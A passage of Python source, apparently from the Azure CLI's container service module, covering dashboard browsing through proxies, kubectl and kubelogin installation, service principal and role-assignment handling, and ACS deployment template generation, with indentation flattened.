from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
import zipfile
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)'
resource_id = resource_id.lower()
match = re.search(pattern, resource_id)
if match:
resource_group_name = match.group(1)
identity_name = match.group(2)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity.client_id
raise InvalidArgumentValueError("Cannot parse identity name from provided resource id {}.".format(resource_id))
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
